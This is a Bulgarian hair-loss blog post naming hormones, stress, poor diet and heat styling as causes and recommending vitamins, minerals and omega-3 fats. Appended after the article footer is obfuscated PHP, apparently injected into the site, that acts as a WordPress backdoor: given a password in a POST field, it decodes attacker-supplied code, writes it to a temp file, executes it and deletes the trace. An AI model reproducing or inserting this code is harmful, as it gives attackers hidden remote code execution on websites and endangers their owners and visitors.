Кои са враговете на нашата коса? | Косопад

Кои са враговете на нашата коса?

kosa-keratin

Сред основните врагове на нашата коса са хормоналните проблеми и промени, като например неправилно функциониране на щитовидната жлеза или настъпване на менопаузата (когато жените вече не произвеждат толкова естроген, както в младостта си).

Стресът и ежедневните тревоги също могат да се отразят върху състоянието на косата ни. Също така, неправилното хранене, в което липсват важни витамини и минерали, важни за здравето на косата ни.

Не трябва да забравяме и за прекаляването с третирането на косата – сешоар, преса, боя за коса, особено амонячните. Така можете да увредите значително космените фоликули, да отслабнат и да доведат до падане на косата.

kosopad-navici

Храненето има ключова роля за предотвратяването на косопада. Храненето, което ни осигурява определени витамини и минерали, помага да имаме здрава коса.

Плодовете, зеленчуците и бобовите храни са основни източници на витамини В и Д, които заздравяват космената структура, като коренът става по- здрав и така вероятността да падне е значително по- малка. Предпазват ни и от вредното въздействие на свободните радикали.

Минерали като сяра и калий помагат за синтеза на кератин, веществото, което изгражда косата и ноктите. Дефицита на желязо прави косата слаба и податлива на косопад. Омега- 3 мастните киселини правят косата блестяща и гъвкава.

12. октомври 2015 10:47:46 от Надя Колева
Категории: Косопад – Статии | Етикети: , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}